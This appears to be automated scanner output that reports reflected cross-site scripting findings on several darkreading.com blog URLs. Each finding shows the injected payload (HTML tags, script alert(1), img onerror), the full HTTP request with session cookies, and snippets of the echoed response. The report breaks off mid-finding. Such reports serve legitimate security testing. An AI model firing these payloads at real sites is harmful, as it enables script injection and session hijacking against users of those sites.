The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 837a8"><a>6f7c4dee08e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/227700969837a8"><a>6f7c4dee08e/defcon-bridging-the-gap-between-hardware-and-software-hacking.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f2753'><img%20src%3da%20onerror%3dalert(1)>bac8c31d381 was submitted in the REST URL parameter 3. This input was echoed as f2753'><img src=a onerror=alert(1)>bac8c31d381 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /blog/227700969/defcon-bridging-the-gap-between-hardware-and-software-hacking.htmlf2753'><img%20src%3da%20onerror%3dalert(1)>bac8c31d381 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db7ee"><a>40b12ebfcce was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/227700969/defcon-bridging-the-gap-between-hardware-and-software-hacking.htmldb7ee"><a>40b12ebfcce HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>DEFCON: B ...[SNIP]... and-software-hacking.htmldb7ee%22%3E%3Ca%3E40b12ebfcce&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/227700969/defcon-bridging-the-gap-between-hardware-and-software-hacking.htmldb7ee"><a>40b12ebfcce"> ...[SNIP]...
3.300. http://www.darkreading.com/blog/227700969/defcon-bridging-the-gap-between-hardware-and-software-hacking.html [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 439cb"><script>alert(1)</script>e68d433efa3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/227700969/defcon-bridging-the-gap-between-hardware-and-software-hacking.html?439cb"><script>alert(1)</script>e68d433efa3=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1a71"><a>7e18c0860cf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/227700991d1a71"><a>7e18c0860cf/top-excuses-for-foregoing-security-monitoring-logging.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff30b"><a>10354fa61dc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/227700991/top-excuses-for-foregoing-security-monitoring-logging.htmlff30b"><a>10354fa61dc HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4c231'><img%20src%3da%20onerror%3dalert(1)>4f1eb94ea3a was submitted in the REST URL parameter 3. This input was echoed as 4c231'><img src=a onerror=alert(1)>4f1eb94ea3a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /blog/227700991/top-excuses-for-foregoing-security-monitoring-logging.html4c231'><img%20src%3da%20onerror%3dalert(1)>4f1eb94ea3a HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
3.304. http://www.darkreading.com/blog/227700991/top-excuses-for-foregoing-security-monitoring-logging.html [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52679"><script>alert(1)</script>de277bf410a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/227700991/top-excuses-for-foregoing-security-monitoring-logging.html?52679"><script>alert(1)</script>de277bf410a=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3ce0"><a>70f6f182464 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/227700998c3ce0"><a>70f6f182464/blocking-zero-days-with-emet-2-0.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f6a74'><img%20src%3da%20onerror%3dalert(1)>177bc2dd7e6 was submitted in the REST URL parameter 3. This input was echoed as f6a74'><img src=a onerror=alert(1)>177bc2dd7e6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /blog/227700998/blocking-zero-days-with-emet-2-0.htmlf6a74'><img%20src%3da%20onerror%3dalert(1)>177bc2dd7e6 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ac76"><a>ae64a4be08b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/227700998/blocking-zero-days-with-emet-2-0.html4ac76"><a>ae64a4be08b HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40238"><a>d7b0ff2af28 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/22790000240238"><a>d7b0ff2af28/smb-guide-to-credit-card-regulations-part-2-the-low-hanging-fruit.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1aaae'><img%20src%3da%20onerror%3dalert(1)>9fe1775f6aa was submitted in the REST URL parameter 3. This input was echoed as 1aaae'><img src=a onerror=alert(1)>9fe1775f6aa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /blog/227900002/smb-guide-to-credit-card-regulations-part-2-the-low-hanging-fruit.html1aaae'><img%20src%3da%20onerror%3dalert(1)>9fe1775f6aa HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 621cd"><a>3961621e973 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/227900002/smb-guide-to-credit-card-regulations-part-2-the-low-hanging-fruit.html621cd"><a>3961621e973 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>More on C ...[SNIP]... ow-hanging-fruit.html621cd%22%3E%3Ca%3E3961621e973&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/227900002/smb-guide-to-credit-card-regulations-part-2-the-low-hanging-fruit.html621cd"><a>3961621e973"> ...[SNIP]...
3.311. http://www.darkreading.com/blog/227900002/smb-guide-to-credit-card-regulations-part-2-the-low-hanging-fruit.html [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51c2a"><script>alert(1)</script>22f4f0bd3a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/227900002/smb-guide-to-credit-card-regulations-part-2-the-low-hanging-fruit.html?51c2a"><script>alert(1)</script>22f4f0bd3a=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>More on C ...[SNIP]... cript%3Ealert%281%29%3C%2Fscript%3E22f4f0bd3a%3D1&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/227900002/smb-guide-to-credit-card-regulations-part-2-the-low-hanging-fruit.html?51c2a"><script>alert(1)</script>22f4f0bd3a=1"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eaf62"><a>15b19048d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/227900004eaf62"><a>15b19048d/hp-and-the-scary-corporate-fifth-column-concept.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8ce44'><img%20src%3da%20onerror%3dalert(1)>62fa8fcc532 was submitted in the REST URL parameter 3. This input was echoed as 8ce44'><img src=a onerror=alert(1)>62fa8fcc532 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /blog/227900004/hp-and-the-scary-corporate-fifth-column-concept.html8ce44'><img%20src%3da%20onerror%3dalert(1)>62fa8fcc532 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e0a0"><img%20src%3da%20onerror%3dalert(1)>7938918e8d1 was submitted in the REST URL parameter 3. This input was echoed as 4e0a0"><img src=a onerror=alert(1)>7938918e8d1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /blog/227900004/hp-and-the-scary-corporate-fifth-column-concept.html4e0a0"><img%20src%3da%20onerror%3dalert(1)>7938918e8d1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>SIP Trunk ...[SNIP]... <a href="http://www.darkreading.com/blog/227900004/hp-and-the-scary-corporate-fifth-column-concept.html4e0a0"><img src=a onerror=alert(1)>7938918e8d1?fmid=15821"> ...[SNIP]...
3.315. http://www.darkreading.com/blog/227900004/hp-and-the-scary-corporate-fifth-column-concept.html [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec0e0"><script>alert(1)</script>07c509ed648 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/227900004/hp-and-the-scary-corporate-fifth-column-concept.html?ec0e0"><script>alert(1)</script>07c509ed648=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 427f6"><a>4f8b078a27d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/228200587427f6"><a>4f8b078a27d/cookies-social-media-and-firesheep.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 42569'><img%20src%3da%20onerror%3dalert(1)>d31f03dcc47 was submitted in the REST URL parameter 3. This input was echoed as 42569'><img src=a onerror=alert(1)>d31f03dcc47 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /blog/228200587/cookies-social-media-and-firesheep.html42569'><img%20src%3da%20onerror%3dalert(1)>d31f03dcc47 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71e8d"><a>34aa7d0cb46 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/228200587/cookies-social-media-and-firesheep.html71e8d"><a>34aa7d0cb46 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Cookies, ...[SNIP]... F228200587%2Fcookies-social-media-and-firesheep.html71e8d%22%3E%3Ca%3E34aa7d0cb46&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/228200587/cookies-social-media-and-firesheep.html71e8d"><a>34aa7d0cb46"> ...[SNIP]...
3.319. http://www.darkreading.com/blog/228200587/cookies-social-media-and-firesheep.html [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be117"><script>alert(1)</script>d8722931d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/228200587/cookies-social-media-and-firesheep.html?be117"><script>alert(1)</script>d8722931d9=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7859"><a>5a8a63d1192 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/228200589e7859"><a>5a8a63d1192/nosql-not-much-anyway.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b850c'><img%20src%3da%20onerror%3dalert(1)>a080f2bcc37 was submitted in the REST URL parameter 3. This input was echoed as b850c'><img src=a onerror=alert(1)>a080f2bcc37 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /blog/228200589/nosql-not-much-anyway.htmlb850c'><img%20src%3da%20onerror%3dalert(1)>a080f2bcc37 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8eb3"><a>da6dde6be11 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/228200589/nosql-not-much-anyway.htmld8eb3"><a>da6dde6be11 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>NoSQL: No ...[SNIP]... w.darkreading.com%2Fblog%2F228200589%2Fnosql-not-much-anyway.htmld8eb3%22%3E%3Ca%3Eda6dde6be11&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/228200589/nosql-not-much-anyway.htmld8eb3"><a>da6dde6be11"> ...[SNIP]...
3.323. http://www.darkreading.com/blog/228200589/nosql-not-much-anyway.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/blog/228200589/nosql-not-much-anyway.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6728"><script>alert(1)</script>600e20ee155 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/228200589/nosql-not-much-anyway.html?f6728"><script>alert(1)</script>600e20ee155=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31801"><a>17e62804bd5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/22820102031801"><a>17e62804bd5/larry-ellison-s-mistress-and-security-as-a-blame-game.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 361e8"><a>61c9a3014cb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/228201020/larry-ellison-s-mistress-and-security-as-a-blame-game.html361e8"><a>61c9a3014cb HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 144d4'><img%20src%3da%20onerror%3dalert(1)>1b7007f2fcc was submitted in the REST URL parameter 3. This input was echoed as 144d4'><img src=a onerror=alert(1)>1b7007f2fcc in the application's response.
